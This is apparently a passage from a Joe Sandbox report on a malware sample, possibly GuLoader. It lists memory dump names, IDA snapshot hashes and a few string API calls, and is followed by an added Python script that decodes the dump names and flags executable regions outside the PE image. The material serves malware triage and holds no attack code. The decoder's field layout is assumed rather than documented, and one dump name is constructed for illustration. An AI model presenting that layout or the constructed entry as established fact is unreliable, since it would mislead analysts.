                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                            • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                            • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                            • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                            • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                            • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                            • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                            • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98
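The "Memory Dump Source" entries above repeat the same five .sdmp file names for process 3, and an analyst triaging a GuLoader report usually wants to know which of those dumps holds executable code and whether any executable region lies outside the mapped PE image (the usual home of unpacked shellcode). The decoder below is an added example and is not Joe Sandbox code; the report does not document the .sdmp naming scheme. It assumes only that the fourth dotted field is the region base address (consistent with "Offset: 00400000, based on PE: true"), the fifth the region protection and the seventh the region type, and it decodes those two with the standard Windows PAGE_* and MEM_* constants (0x20 = PAGE_EXECUTE_READ, 0x02 = PAGE_READONLY, 0x08 = PAGE_WRITECOPY, 0x1000000 = MEM_IMAGE). The other fields are carried through uninterpreted, and the extra RWX private-region name at the end is constructed for illustration.

```python
"""Decode Joe Sandbox .sdmp dump names into region metadata (added example,
not Joe Sandbox code). Assumed, undocumented field layout:
  <proc>.<dump>.<region id>.<base addr>.<protection>.<f6>.<type>.<f8>.sdmp
Only base, protection and type are interpreted; f6/f8 are kept raw."""
import re
from dataclasses import dataclass
from typing import Iterable, List

# Standard Windows memory protection and region-type constants.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_GUARD, PAGE_NOCACHE = 0x100, 0x200
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_NAME = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<region>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    proc: int
    dump: int
    base: int
    protect: int
    mem_type: int

    @property
    def protection(self) -> str:
        """Human-readable PAGE_* name, plus GUARD/NOCACHE modifiers if set."""
        names = [PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")]
        if self.protect & PAGE_GUARD:
            names.append("PAGE_GUARD")
        if self.protect & PAGE_NOCACHE:
            names.append("PAGE_NOCACHE")
        return "|".join(names)

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def executable(self) -> bool:
        # All PAGE_EXECUTE* values live in the high nibble of the low byte.
        return bool(self.protect & 0xF0)


def parse_dump_name(name: str) -> DumpRegion:
    m = _NAME.match(name.strip())
    if not m:
        raise ValueError(f"not a .sdmp name: {name!r}")
    # proc/dump are assumed to be hex; for the small values seen it makes no difference.
    return DumpRegion(name=name.strip(), proc=int(m["proc"], 16), dump=int(m["dump"], 16),
                      base=int(m["base"], 16), protect=int(m["protect"], 16),
                      mem_type=int(m["mtype"], 16))


def image_layout(names: Iterable[str]) -> List[DumpRegion]:
    """Parse and order regions by base address (duplicates collapsed)."""
    regions = {r.base: r for r in (parse_dump_name(n) for n in names)}
    return [regions[b] for b in sorted(regions)]


def suspicious_executable(names: Iterable[str]) -> List[int]:
    """Bases of executable regions that are NOT part of a mapped PE image.
    In a GuLoader run these are where the decrypted shellcode normally lives."""
    return [r.base for r in image_layout(names) if r.executable and r.type_name != "MEM_IMAGE"]


# The five dump names listed on the report page for process 3.
PAGE_DUMPS = [
    "00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp",
    "00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp",
    "00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp",
    "00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp",
    "00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp",
]
# Constructed for illustration only: an RWX private region, not from the report.
CONSTRUCTED_RWX = "00000003.00000002.2624100000.00000000002A0000.00000040.00000001.00020000.00000003.sdmp"

if __name__ == "__main__":
    for r in image_layout(PAGE_DUMPS + [CONSTRUCTED_RWX]):
        print(f"{r.base:#010x} {r.protection:<24} {r.type_name}")
    print("non-image executable regions:", [hex(b) for b in suspicious_executable(PAGE_DUMPS + [CONSTRUCTED_RWX])])
```

Run against the page's own five names, the layout comes out as a read-only header at 0x400000, an execute-read .text region at 0x401000, read-only data at 0x408000, a write-copy region at 0x40A000 and read-only data at 0x455000, all MEM_IMAGE, so nothing is flagged; the constructed 0x2A0000 entry is the shape of dump you would pull first when looking for the unpacked payload.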